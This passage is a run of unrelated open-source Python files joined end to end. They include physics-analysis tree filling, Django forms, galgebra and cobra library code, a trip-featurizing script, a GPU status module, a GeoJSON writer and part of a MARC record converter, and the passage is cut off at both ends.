else pi1_tauminus.p.pz) self.tree.fill('pi2_tauminus_q', pi2_tauminus.charge) self.tree.fill('pi2_tauminus_px', numpy.random.normal(pi2_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.px) self.tree.fill('pi2_tauminus_py', numpy.random.normal(pi2_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.py) self.tree.fill('pi2_tauminus_pz', numpy.random.normal(pi2_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.pz) self.tree.fill('pi3_tauminus_q', pi3_tauminus.charge) self.tree.fill('pi3_tauminus_px', numpy.random.normal(pi3_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.px) self.tree.fill('pi3_tauminus_py', numpy.random.normal(pi3_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.py) self.tree.fill('pi3_tauminus_pz', numpy.random.normal(pi3_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.pz) self.tree.fill('k_q', k.charge) self.tree.fill('k_px', numpy.random.normal(k.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else k.p.px) self.tree.fill('k_py', numpy.random.normal(k.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else k.p.py) self.tree.fill('k_pz', numpy.random.normal(k.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else k.p.pz) self.tree.fill('pi_kstar_q', pi_kstar.charge) self.tree.fill('pi_kstar_px', numpy.random.normal(pi_kstar.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.px) self.tree.fill('pi_kstar_py', numpy.random.normal(pi_kstar.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.py) self.tree.fill('pi_kstar_pz', numpy.random.normal(pi_kstar.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.pz) self.tree.tree.Fill()
# -*- coding: utf-8 -*- """ Define forms for each request for validating request arguments """ from django import forms from tcms.testruns.models import TestCaseRun from tcms.core.forms.fields import StripURLField __all__ = ( "BasicValidationForm", "AddLinkReferenceForm", ) LINKREF_TARGET = { "TestCaseRun": TestCaseRun, } class TargetCharField(forms.CharField): """Return clean Model class besides all of CharField""" default_error_messages = { "invalid_target": "Invalid target %(value)s. TCMS cannot determine the" " model class according to this target." } def __init__(self, targets={}, *args, **kwargs): super().__init__(*args, **kwargs) self.targets = targets def clean(self, value): """Return the Model class object associated with the value""" super().clean(value) model_class = self.targets.get(value, None) if model_class is None: raise forms.ValidationError(self.error_messages["invalid_target"] % {"value": value}) return model_class class BasicValidationForm(forms.Form): """Validate target and target ID basically""" target = TargetCharField( targets=LINKREF_TARGET, error_messages={ "required": "Due to miss the target argument, TCMS does not know " "to which the new link will be linked." }, ) target_id = forms.IntegerField( error_messages={ "required": "target ID argument should appear in the request for " "adding new link as long as the target argument." } ) class AddLinkReferenceForm(BasicValidationForm): """Validate the argument within the request for adding new link""" name = forms.CharField(error_messages={"required": "You should name this new link."}) url = StripURLField(error_messages={"required": "Missing URL."})
from sympy import symbols, sin, pi, latex from galgebra.ga import Ga from galgebra.printer import Format, xpdf Format() coords = (r, th, phi) = symbols('r,theta,phi', real=True) sp3d = Ga('e_r e_th e_ph', g=[1, r**2, r**2 * sin(th)**2], coords=coords, norm=True) sph_uv = (u, v) = symbols('u,v', real=True) sph_map = [1, u, v] # Coordinate map for sphere of r = 1 sph2d = sp3d.sm(sph_map, sph_uv) print(r'(u,v)\rightarrow (r,\theta,\phi) = ', latex(sph_map)) # FIXME submanifold basis vectors are not normalized, g is incorrect print('g =', latex(sph2d.g)) F = sph2d.mv('F', 'vector', f=True) # scalar function f = sph2d.mv('f', 'scalar', f=True) # vector function print(r'\nabla f =', sph2d.grad * f) print('F =', F) print(r'\nabla F = ', sph2d.grad * F) cir_s = s = symbols('s', real=True) cir_map = [pi / 8, s] cir1d = sph2d.sm(cir_map, (cir_s,)) print('g =', latex(cir1d.g)) h = cir1d.mv('h', 'scalar', f=True) H = cir1d.mv('H', 'vector', f=True) print(r'(s)\rightarrow (u,v) = ', latex(cir_map)) print('H =', H) print(latex(H)) print(r'\nabla h =', cir1d.grad * h) print(r'\nabla H =', cir1d.grad * H) xpdf(filename='submanifold.tex', paper=(6, 5), crop=True)
# -*- coding: utf-8 -*- from __future__ import absolute_import import re from ast import parse as ast_parse from ast import ( And, BitAnd, BitOr, BoolOp, Expression, Name, NodeTransformer, Or) from keyword import kwlist from warnings import warn from cobra.core.species import Species from cobra.util import resettable from cobra.util.util import format_long_string keywords = list(kwlist) keywords.remove("and") keywords.remove("or") keywords.extend(("True", "False")) keyword_re = re.compile(r"(?=\b(%s)\b)" % "|".join(keywords)) number_start_re = re.compile(r"(?=\b[0-9])") replacements = ( (".", "__COBRA_DOT__"), ("'", "__COBRA_SQUOTE__"), ('"', "__COBRA_DQUOTE__"), (":", "__COBRA_COLON__"), ("/", "__COBRA_FSLASH__"), ("\\", "__COBRA_BSLASH"), ("-", "__COBRA_DASH__"), ("=", "__COBRA_EQ__") ) # functions for gene reaction rules def ast2str(expr, level=0, names=None): """convert compiled ast to gene_reaction_rule str Parameters ---------- expr : str string for a gene reaction rule, e.g "a and b" level : int internal use only names : dict Dict where each element id a gene identifier and the value is the gene name. Use this to get a rule str which uses names instead. This should be done for display purposes only. All gene_reaction_rule strings which are computed with should use the id. Returns ------ string The gene reaction rule """ if isinstance(expr, Expression): return ast2str(expr.body, 0, names) \ if hasattr(expr, "body") else "" elif isinstance(expr, Name): return names.get(expr.id, expr.id) if names else expr.id elif isinstance(expr, BoolOp): op = expr.op if isinstance(op, Or): str_exp = " or ".join(ast2str(i, level + 1, names) for i in expr.values) elif isinstance(op, And): str_exp = " and ".join(ast2str(i, level + 1, names) for i in expr.values) else: raise TypeError("unsupported operation " + op.__class__.__name) return "(" + str_exp + ")" if level else str_exp elif expr is None: return "" else: raise TypeError("unsupported operation " + repr(expr)) def eval_gpr(expr, knockouts): """evaluate compiled ast of gene_reaction_rule with knockouts Parameters ---------- expr : Expression The ast of the gene reaction rule knockouts : DictList, set Set of genes that are knocked out Returns ------- bool True if the gene reaction rule is true with the given knockouts otherwise false """ if isinstance(expr, Expression): return eval_gpr(expr.body, knockouts) elif isinstance(expr, Name): return expr.id not in knockouts elif isinstance(expr, BoolOp): op = expr.op if isinstance(op, Or): return any(eval_gpr(i, knockouts) for i in expr.values) elif isinstance(op, And): return all(eval_gpr(i, knockouts) for i in expr.values) else: raise TypeError("unsupported operation " + op.__class__.__name__) elif expr is None: return True else: raise TypeError("unsupported operation " + repr(expr)) class GPRCleaner(NodeTransformer): """Parses compiled ast of a gene_reaction_rule and identifies genes Parts of the tree are rewritten to allow periods in gene ID's and bitwise boolean operations""" def __init__(self): NodeTransformer.__init__(self) self.gene_set = set() def visit_Name(self, node): if node.id.startswith("__cobra_escape__"): node.id = node.id[16:] for char, escaped in replacements: if escaped in node.id: node.id = node.id.replace(escaped, char) self.gene_set.add(node.id) return node def visit_BinOp(self, node): self.generic_visit(node) if isinstance(node.op, BitAnd): return BoolOp(And(), (node.left, node.right)) elif isinstance(node.op, BitOr): return BoolOp(Or(), (node.left, node.right)) else: raise TypeError("unsupported operation '%s'" % node.op.__class__.__name__) def parse_gpr(str_expr): """parse gpr into AST Parameters ---------- str_expr : string string with the gene reaction rule to parse Returns ------- tuple elements ast_tree and gene_ids as a set """ str_expr = str_expr.strip() if len(str_expr) == 0: return None, set() for char, escaped in replacements: if char in str_expr: str_expr = str_expr.replace(char, escaped) escaped_str = keyword_re.sub("__cobra_escape__", str_expr) escaped_str = number_start_re.sub("__cobra_escape__", escaped_str) tree = ast_parse(escaped_str, "<string>", "eval") cleaner = GPRCleaner() cleaner.visit(tree) eval_gpr(tree, set()) # ensure the rule can be evaluated return tree, cleaner.gene_set class Gene(Species): """A Gene in a cobra model Parameters ---------- id : string The identifier to associate the gene with name: string A longer human readable name for the gene functional: bool Indicates whether the gene is functional. If it is not functional then it cannot be used in an enzyme complex nor can its products be used. """ def __init__(self, id=None, name="", functional=True): Species.__init__(self, id=id, name=name) self._functional = functional @property def functional(self): """A flag indicating if the gene is functional. Changing the flag is reverted upon exit if executed within the model as context. """ return self._functional @functional.setter @resettable def functional(self, value): if not isinstance(value, bool): raise ValueError('expected boolean') self._functional = value def knock_out(self): """Knockout gene by marking it as non-functional and setting all associated reactions bounds to zero. The change is reverted upon exit if executed within the model as context. """ self.functional = False for reaction in self.reactions: if not reaction.functional: reaction.bounds = (0, 0) def remove_from_model(self, model=None, make_dependent_reactions_nonfunctional=True): """Removes the association Parameters ---------- model : cobra model The model to remove the gene from make_dependent_reactions_nonfunctional : bool If True then replace the gene with 'False' in the gene association, else replace the gene with 'True' .. deprecated :: 0.4 Use cobra.manipulation.delete_model_genes to simulate knockouts and cobra.manipulation.remove_genes to remove genes from the model. """ warn("Use cobra.manipulation.remove_genes instead") if model is not None: if model != self._model: raise Exception("%s is a member of %s, not %s" % (repr(self), repr(self._model), repr(model))) if self._model is None: raise Exception('%s is not in a model' % repr(self)) if make_dependent_reactions_nonfunctional: gene_state = 'False' else: gene_state = 'True' the_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' % re.escape(self.id)) self._model.genes.remove(self) self._model = None for the_reaction in list(self._reaction): the_reaction._gene_reaction_rule = the_gene_re.sub( gene_state, the_reaction.gene_reaction_rule) the_reaction._genes.remove(self) # Now, deactivate the reaction if its gene association evaluates # to False the_gene_reaction_relation = the_reaction.gene_reaction_rule for other_gene in the_reaction._genes: other_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' % re.escape(other_gene.id)) the_gene_reaction_relation = other_gene_re.sub( 'True', the_gene_reaction_relation) if not eval(the_gene_reaction_relation): the_reaction.lower_bound = 0 the_reaction.upper_bound = 0 self._reaction.clear() def _repr_html_(self): return """ <table> <tr> <td><strong>Gene identifier</strong></td><td>{id}</td> </tr><tr> <td><strong>Name</strong></td><td>{name}</td> </tr><tr> <td><strong>Memory address</strong></td> <td>{address}</td> </tr><tr> <td><strong>Functional</strong></td><td>{functional}</td> </tr><tr> <td><strong>In {n_reactions} reaction(s)</strong></td><td> {reactions}</td> </tr> </table>""".format(id=self.id, name=self.name, functional=self.functional, address='0x0%x' % id(self), n_reactions=len(self.reactions), reactions=format_long_string( ', '.join(r.id for r in self.reactions), 200))
#!/usr/bin/env python3 """ This script featurizes the data (low level features: cartesian --> polar --> velocity --> acceleration) For each file(trip) in path, loads data into a pandas DataFrame, adds features, pickles DataFrame and saves in file with corresponding name Dependencies: Python3, Pandas, Numpy, Theano, Lasagne Command Line Arguments: -source Data source folder, expects unzipped data -dest Destination folder -procs Number of processes to spawn during featurizing Eg: $ python3 featurize_data.py -source data/drivers -dest data/drivers_featurized -procs 4 """ __author__ = 'Sid Pramod' __all__ = ['featurize_trip, featurize_driver, featurize_all'] import argparse import os import errno import warnings import numpy as np import pandas as pd import multiprocessing def _parse_cmd(): """ Parse command line arguments.""" cmd = argparse.ArgumentParser(description='Run Classifier') cmd.add_argument('-source', default='data/drivers', help='Data source folder (unzipped)') cmd.add_argument('-dest', default='data/drivers_featurized', help='Destination folder') cmd.add_argument('-procs', default=4, type=int, help='Number of processes to spawn') options = cmd.parse_args() try: os.makedirs(options.dest) except OSError as exception: if exception.errno == errno.EEXIST: warnings.warn('Folder {0} already exists, files may be overwritten'.format(options.dest)) else: raise return options def _load_csv_trip(filename, dtype=np.float64): """ Load data corresponding to a single trip from csv file named `filename`.""" df = pd.DataFrame.from_csv(path=filename, index_col=None).astype(dtype) np.testing.assert_equal(df.columns, np.array(['x', 'y'])) # from the data, it seems all positions are relative since they all seem to start at 0, 0; # asserting to make sure and explicit np.testing.assert_equal(df.iloc[0], np.array([0, 0])) # remove any nan df.interpolate() assert(not np.any(np.isnan(df.values))) return df def _get_polar_trip(df): """ Obtain polar co-ordinates from cartesian.""" assert('x' in df.columns and 'y' in df.columns) # Reference x and y x, y = df['x'], df['y'] # Get polar co-ordinates df['r'] = np.sqrt(x ** 2 + y ** 2) df['th'] = np.arctan2(y, x) return def _get_velocity_trip(df): """ Add velocities. Assumes df has polar co-ords.""" assert('r' in df.columns and 'th' in df.columns) # Reference r and th r, th = df['r'], df['th'] # Get velocities in r and th directions dt = 1 df['vel_r'] = np.gradient(r, dt) df['vel_th'] = np.gradient(th, dt) return def _get_acceleration_trip(df): """ Add accelerations. Assumes df has velocities.""" assert('vel_r' in df.columns and 'vel_th' in df.columns) # Reference vel_r and vel_th vel_r, vel_th = df['vel_r'], df['vel_th'] # Get velocities in r and th directions dt = 1 df['acc_r'] = np.gradient(vel_r, dt) df['acc_th'] = np.gradient(vel_th, dt) return def _add_features_trip(df): """ Convert to polar, add first and second derivative (velocity and acceleration).""" _get_polar_trip(df) _get_velocity_trip(df) _get_acceleration_trip(df) return def featurize_trip(source_file, dest_file): """ Do all that this program is supposed to for a single trip.""" if source_file == dest_file: raise ValueError('Source file cannot be destination file, overwriting disabled.') df = _load_csv_trip(source_file) _add_features_trip(df) if not os.path.exists(os.path.dirname(dest_file)): os.makedirs(os.path.dirname(dest_file)) df.astype(np.float32).to_pickle(dest_file) return def featurize_driver(source_folder, dest_folder): """ Do all that this program is supposed to for all trips from a single driver.""" if source_folder == dest_folder: raise ValueError('Source folder cannot be destination folder, overwriting disabled.') files = [f for f in os.listdir(source_folder) if os.path.isfile(os.path.join(source_folder, f))] source = lambda f: os.path.join(source_folder, f) dest = lambda f: os.path.join(dest_folder, os.path.splitext(f)[0] + '.pkl') for f in files: featurize_trip(source(f), dest(f)) return def featurize_all(source_folder, dest_folder, multiproc_poolsize=1): """ Do all that this program is supposed to for all trips from all drivers.""" if source_folder == dest_folder: raise ValueError('Source folder cannot be destination folder, overwriting disabled.') sub_folders = [s for s in os.listdir(source_folder) if os.path.isdir(os.path.join(source_folder, s))] pool = multiprocessing.Pool(multiproc_poolsize) source_sub_folder = lambda s: os.path.join(source_folder, s) dest_sub_folder = lambda s: os.path.join(dest_folder, s) pool.starmap(featurize_driver, [(source_sub_folder(s), dest_sub_folder(s)) for s in sub_folders]) return def main(): options = _parse_cmd() featurize_all(source_folder=options.source, dest_folder=options.dest, multiproc_poolsize=options.procs) if __name__ == '__main__': main()
from i3pystatus import IntervalModule from .utils import gpu class GPUMemory(IntervalModule): """ Shows GPU memory load Currently Nvidia only and nvidia-smi required .. rubric:: Available formatters * {avail_mem} * {percent_used_mem} * {used_mem} * {total_mem} """ settings = ( ("format", "format string used for output."), ("divisor", "divide all megabyte values by this value, default is 1 (megabytes)"), ("warn_percentage", "minimal percentage for warn state"), ("alert_percentage", "minimal percentage for alert state"), ("color", "standard color"), ("warn_color", "defines the color used wann warn percentage ist exceeded"), ("alert_color", "defines the color used when alert percentage is exceeded"), ("round_size", "defines number of digits in round"), ) format = "{avail_mem} MiB" divisor = 1 color = "#00FF00" warn_color = "#FFFF00" alert_color = "#FF0000" warn_percentage = 50 alert_percentage = 80 round_size = 1 def run(self): info = gpu.query_nvidia_smi() if info.used_mem is not None and info.total_mem is not None: mem_percent = 100 * info.used_mem / info.total_mem else: mem_percent = None if mem_percent >= self.alert_percentage: color = self.alert_color elif mem_percent >= self.warn_percentage: color = self.warn_color else: color = self.color cdict = { "used_mem": info.used_mem / self.divisor, "avail_mem": info.avail_mem / self.divisor, "total_mem": info.total_mem / self.divisor, "percent_used_mem": mem_percent, } for key, value in cdict.items(): if value is not None: cdict[key] = round(value, self.round_size) self.data = cdict self.output = { "full_text": self.format.format(**cdict), "color": color }
#!/usr/bin/env python # -*- coding: utf-8 -*- #------------------------------------------------------------------------------- # Author: Alexis Luengas Zimmer # Created: 5 Dec. 2014 #------------------------------------------------------------------------------- from os.path import basename, isdir, dirname import pandas as pd import igraph as gr #------------------------------------------------------------------------------- def collect_data(json_files): """ json_files: a list containing json path-strings Returns a sorted pandas.DataFrame object made up of all json objects together. """ df_list = [] print "Processing..." for filepath in json_files: print "\rLoading file \"%s\"" % basename(filepath) df = build_df(filepath) df_list.append(df) df = pd.concat(df_list) # merge list info one DF df.sort(inplace=True) return df def build_df(json_path): df = pd.read_json(json_path) df["pid"] = [r["id"] for r in df.reporter] # pid ~ person id df["name"] = [r["name"] for r in df.reporter] df = df[["pid", "created_at", "lat", "lng", "name"]].sort(["pid", "created_at"]).set_index("pid") return df def df_to_graph(df): # Build naked graph g = gr.Graph(len(df.index.levels[0][1:])) # slice out first (anonymous) id return g #------------------------------------------------------------------------------- def write_geojson(df, outpath): geojson = '{"type":"FeatureCollection","features":[' for pid, fr in df[df.index > 0].groupby(level=0): # exclude id 0 (anonymous) name = df.ix[pid]["name"] if isinstance(df.ix[pid]["name"], unicode) \ else df.ix[pid]["name"].iloc[0] # take the first name in the list geojson += ('{"type":"Feature","properties":{"id":' + str(pid) + ',"name":' + '"%s"' % name + '},"geometry":{"type":"LineString","coordinates":[') for i, r in fr.iterrows(): c = "[{0},{1}],".format(r["lng"], r["lat"]) # geojson coordinates follow [lng, lat] formatting geojson += c geojson = geojson[:-1] + "]}}," # remove trailing comma of last coord. geojson = geojson[:-1] + "]}" # remove trailing comma of last path with open(outpath, "wt") as fout: fout.write(geojson.encode('utf-8')) #------------------------------------------------------------------------------- if __name__ == '__main__': from optparse import OptionParser usage = "./%prog [options] path\n\npath -- the path of a JSON file or a directory containing such files." parser = OptionParser(usage=usage) parser.add_option("-w", dest="filename", type="string", help="write GeoJSON file to the specified path FILENAME") (options, args) = parser.parse_args() # terminal interface if len(args) > 0: from os import listdir from os.path import isfile, abspath, join, splitext # input path if isdir(args[0]): dirpath = args[0] json_files = [abspath(join(dirpath, f)) for f in listdir(dirpath) \ if isfile(join(dirpath, f)) and splitext(f)[1] == '.json'] elif all([isfile(a) for a in args]) \ and all([a.endswith('.json') for a in args]): json_files = [abspath(f) for f in args] else: raise IOError("Files must be in JSON format") if len(json_files) == 0: raise IOError("No JSON files within the directory: " + dirpath) df = collect_data(json_files) if options.filename: write_geojson(df, options.filename) c = {'green': "\033[92m", 'endc': "\033[0m"} print c['green'] + "Data written to: " \ + abspath(options.filename) + c['endc'] else: parser.print_help() #-------------------------------------------------------------------------------
# -*- coding: utf-8 -*- ## ## This file is part of CDS Invenio. ## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN. ## ## CDS Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## CDS Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with CDS Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Library of functions for the xmlmarc2textmarc utility.""" from __future__ import generators __revision__ = "$Id$" from invenio.bibrecord import \ create_records, \ record_get_field_values, \ record_order_fields from invenio.config import CFG_CERN_SITE, CFG_SITE_NAME from random import randint, seed from os.path import basename import getopt, sys ## maximum length of an ALEPH MARC record line CFG_MAXLEN_ALEPH_LINE = 1500 if CFG_CERN_SITE: ## This is a CERN installation. Set the organization's identifier to ## "SzGeCERN". This value will be used when adding the mandatory "003" ## ALEPH control field when translating a MARC XML record that does not ## already have the field. CFG_ORGANIZATION_IDENTIFIER = "SzGeCERN" else: ## This is not a CERN installation. The organization's identifier should be ## set with the appropriate value. If it is left empty, MARC XML -> ALEPH ## conversions in INSERT record and REPLACE record modes will fail. ## ## ***NOTE: SET ME!*** ## CFG_ORGANIZATION_IDENTIFIER = "" def get_fieldname_changes(): """Get a dictionary of CDS MARC field names to be replaced with ALEPH fieldnames in an ALEPH MARC record. @return: dict {'cds_fieldname' : 'replacement_aleph_fieldname', 'cds_fieldname' : 'replacement_aleph_fieldname', [...] } """ return { '960' : 'BAS', '961' : 'CAT', '962' : 'LKR', '963' : 'OWN', '964' : 'ITM', '970' : 'SYS', } def get_fields_dropped_in_aleph(): """Get a list of fieldnames to be dropped from an ALEPH MARC record. These fields are dropped before the function 'get_fieldname_changes' is called, so even if they appear in the dictionary of field-name changes returned by that function, they won't appear in the output Aleph MARC record. @return: list [fieldname, fieldname, [...]] """ return [ '961', '970', '980', 'FFT', ] def get_aleph_001(sysno): """Get a 001 string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " 001 L %s" % (sysno,) def get_aleph_FMT(): """Get a FMT string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " FMT L BK" def get_aleph_OWN(): """Get an "OWN$$aPUBLIC" string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " OWN L $$aPUBLIC" def get_aleph_DEL(): """Get a "DEL$$aY" string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " DEL L $$aY" def get_aleph_LDR(): """Get a LDR string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " LDR L ^^^^^nam^^22^^^^^^a^4500" def get_aleph_003(): """Get a 003 string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " 003 L %s" % CFG_ORGANIZATION_IDENTIFIER def get_aleph_008(): """Get a 008 string for an ALEPH MARC record, (without the SYS prefix). @return: string """ return " 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d" def get_sysno_generator(): """Create and return a generator for an ALEPH system number. The generator will create a 9-digit string, i.e. the sequence will end when it reaches 1000000000. @return: generator. """ sysno = "" seed() ## make a 3-digit string for sysno's value: for dummy in range(0, 3): sysno += str(randint(1, 9)) sysno = int(sysno) while sysno < 1000000000: yield """%09d""" % sysno sysno = sysno + 1 def create_marc_record(record, sysno, options): """Create a text-marc, or aleph-marc record from the contents of "record", and return it as a string. @param record: Internal representation of an XML MARC record, created by bibrecord. @param sysno: the system number to be used for the record @param options: the options about the MARC record to be created, as passed from command line @return: string (MARC record, either text-marc or ALEPH marc format, depending upon "options". """ out = "" ## String containing record to be printed display_001 = 0 ## Flag used in ALEPH MARC mode to determine whether ## or not to print the "001" field ## Get a dictionary containing the names of fields to change for ## the output record: if options["aleph-marc"] == 1: fieldname_changes = get_fieldname_changes() else: fieldname_changes = {} if options["aleph-marc"] == 1: ## Perform some ALEPH-MARC specific tasks: ## Assume that we will NOT display "001": display_001 = 0 ## Add ALEPH record headers to the output record: if 1 not in (options["correct-mode"], options["append-mode"]): ## This is not an ALEPH "correct" or "append" record. The ## record must therefore have FMT and LDR fields. E.g.: ## 123456789 FMT L BK ## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500 out += """%(sys)s%(fmt)s %(sys)s%(ldr)s\n""" % { 'sys' : sysno, 'fmt' : get_aleph_FMT(), 'ldr' : get_aleph_LDR() } if options["delete-mode"] == 1: ## This is an ALEPH 'delete' record. Add the DEL field ## then return the 'completed' record (in delete mode, ## the record only needs the leaders, and a 'DEL' field, e.g.: ## 123456789 FMT L BK ## 123456789 LDR L ^^^^^nam^^22^^^^^^a^4500 ## 123456789 DEL L $$aY out += """%(sys)s%(del)s\n""" % { 'sys' : sysno, 'del' : get_aleph_DEL() } return out elif 1 in (options["insert-mode"], options["replace-mode"]): ## Either an ALEPH 'insert' or 'replace' record is being created. ## It needs to have 008 and OWN fields. E.g.: ## 123456789 008 L ^^^^^^s^^^^^^^^^^^^^^^^r^^^^^000^0^eng^d ## 123456789 OWN L $$aPUBLIC out += """%(sys)s%(008)s\n""" % { 'sys' : sysno, '008' : get_aleph_008() } ## The "OWN" field should only be printed at this level if the ## MARC XML did not have an OWN (963__a) field: if "PUBLIC" not in \ record_get_field_values(record, "963", code="a"): ## Add OWN field: out += """%(sys)s%(own)s\n""" % { 'sys' : sysno, 'own' : get_aleph_OWN() } if options["replace-mode"] == 1: ## In 'replace' mode, the record should have a 001 field: display_001 = 1 ## Remove fields unwanted in ALEPH MARC: for deltag in get_fields_dropped_in_aleph(): try: del record[deltag] except KeyError: ## tag doesn't exist in record: pass ## now add 001, since it is a special field: if options["text-marc"] == 1: try: ## get the 001 line(s): lines_001 = create_field_lines(fieldname="001", \ field=record["001"][0], \ sysno=sysno, \ alephmarc=options["aleph-marc"]) ## print the 001 line(s): out += print_field(field_lines=lines_001, \ alephmarc=options["aleph-marc"]) except KeyError: ## no 001 field pass elif options["aleph-marc"] == 1: ## If desirable, build the "001" line: if display_001 == 1: try: ## make the 001 line(s): line_leader = """%(sys)s """ % { 'sys' : sysno } line_leader += """%(fieldname)s L """ % { 'fieldname' : "001" } lines_001 = [[["", line_leader], ["", sysno]]] ## print the 001 line(s): out += print_field(field_lines=lines_001, \ alephmarc=options["aleph-marc"]) except KeyError: ## no 001 field pass ## Now, if running in "insert" or "replace" mode, add "003": ## 003 is a mandatory field in an ALEPH record. It contains the ## identifier for the organization that has generated the SYS (001) ## for the record. As such, it is necessary to drop any existing 003 ## from the record, then add our own 003. ## First, drop the "003" field from the record: try: del record["003"] except KeyError: ## There was no 003 pass ## Now add a correct 003 (if desirable): if 1 in (options["insert-mode"], options["replace-mode"]): out += """%(sys)s%(own)s\n""" % { 'sys' : sysno, 'own' : get_aleph_003() } ## delete 001 from the list of fields to output (if it exists): try: del record["001"] except KeyError: ## There was no 001 pass ## Get the fields of this record, and order them correctly (using the same ## order as that of the original MARC XML file): fields = [] for tag in record.keys(): for field in record[tag]: fields.append((tag, field)) record_order_fields(fields) ## Finally, loop through all fields and display them in the record: for field in fields: ## Should the field-name be changed? try: fieldname = fieldname_changes[str(field[0])] except KeyError: ## Don't change this fieldname: fieldname = field[0] ## get the subfields, etc, for this field: fielddata = field[1] ## Create the MARC lines for this field: field_lines = create_field_lines(fieldname, \ fielddata, \ sysno, \ options["aleph-marc"]) ## Now create the formatted MARC lines: out += print_field(field_lines, options["aleph-marc"]) ## Return the formatted MARC record: return out def print_field(field_lines, alephmarc=0): """Create the lines of a record relating to a given field, and return these lines as a string. @param field_lines: A list of lists, whereby each item in the top-level list is an instance of a field (e.g. a "datafield" or "controlfield"). @param alephmarc: an integer flag to tell the function whether or not the record being created is a pure text MARC record, or an ALEPH MARC record. @return: A string containing the record lines for the given field """ if type(field_lines) not in (list, tuple): return "" out = "" if alephmarc == 0: ## creating a text-marc record for line in field_lines: ## create line in text-marc mode: for segment in line: segment[1] = segment[1].replace(" \n", " ") segment[1] = segment[1].replace("\n", " ") out += "%(code)s%(value)s" % { 'code' : segment[0], 'value' : segment[1] } out += "\n" else: ## creating an aleph-marc record for line in field_lines: cur_line_len = 0 glue_count = 0 num_linesegments = len(line) if num_linesegments > 1: line_leader_len = len(line[0][1]) printable_line = "" i = 1 while i < num_linesegments: line[i][1] = line[i][1].replace(" \n", " ") line[i][1] = line[i][1].replace("\n", " ") cur_segment_len = len(line[i][0]) + len(line[i][1]) if (line_leader_len + cur_line_len + cur_segment_len + 2 \ + len(str(glue_count))) > (CFG_MAXLEN_ALEPH_LINE - 25): ## adding this segment makes the line too long. It ## must be printed now with the ALEPH $$9 glue. ## How much of the current line can be printed? space_remaining = (CFG_MAXLEN_ALEPH_LINE - 25) - \ (line_leader_len + cur_line_len + 3) \ - len(line[i][0]) if space_remaining > 0: ## there is space to add some of this line printable_line += line[i][0] + \ line[i][1][0:space_remaining] line[i][1] = line[i][1][space_remaining:] ## print this line: out += """%(sys)s$$9%(glue_count)s""" \ """%(printable_line)s\n""" \ % { 'sys' : line[0][1], 'glue_count' : str(glue_count), 'printable_line' : printable_line, } ## update glue count, and reset printable line glue_count += 1 printable_line = "" cur_line_len = 0 else: ## Including this line segment, the line fits within a ## maximum line length, so add it: printable_line += line[i][0] + line[i][1] cur_line_len += (len(line[i][0]) + len(line[i][1])) i += 1 ## Now add to the display string, any of the line ## that remains in printable line: if len(printable_line) > 0: if glue_count > 0: out += """%(sys)s$$9%(glue_count)s""" \ """%(printable_line)s\n""" \ % { 'sys' : line[0][1], 'glue_count' : str(glue_count), 'printable_line' : printable_line } else: out += """%(sys)s%(printable_line)s\n""" \ % { 'sys' : line[0][1], 'printable_line' : printable_line } elif num_linesegments == 1: ## strange - only a SYS? out += "%(sys)s\n" % { 'sys' : line[0][1] } return out def create_field_lines(fieldname, field, sysno, alephmarc=0): """From the internal representation of a field, as pulled from a record created by bibrecord, create a list of lists whereby each item in the top-level list represents a record line that should be created for the field, and each sublist represents the various components that make up that line (sysno, line label, subfields, etc...) @param fieldname: the name for the field (e.g. 001) - string @param field: the internal representation of the field, as created by bibrecord - list @param sysno: the system number to be used for the created field - string @param alephmarc: a flag telling the function whether a pure text MARC or an ALEPH MARC record is being created - int @return: list, containing the details of the created field lines """ field_lines = [] field_instance_line_segments = [] out = """%(sys)s """ % { 'sys' : sysno } out += """%(fieldname)s""" % { 'fieldname' : fieldname } if alephmarc != 0: ## aleph marc record - format indicators properly: out += """%(ind1)s%(ind2)s L """ \ % { 'ind1' : (field[1] not in ("", " ") and field[1]) \ or ((field[2] not in ("", " ") and "_") or (" ")), 'ind2' : (field[2] not in ("", " ") and field[2]) or (" ") } else: ## text marc record - when empty, indicators should appear as unserscores: out += """%(ind1)s%(ind2)s """ \ % { 'ind1' : (field[1] not in ("", " ") and field[1]) or ("_"), 'ind2' : (field[2] not in ("", " ") and field[2]) or ("_"), } ## append field label to line segments list: field_instance_line_segments.append(["", out]) ## now, loop through the subfields (or controlfield data) and ## add each of them to 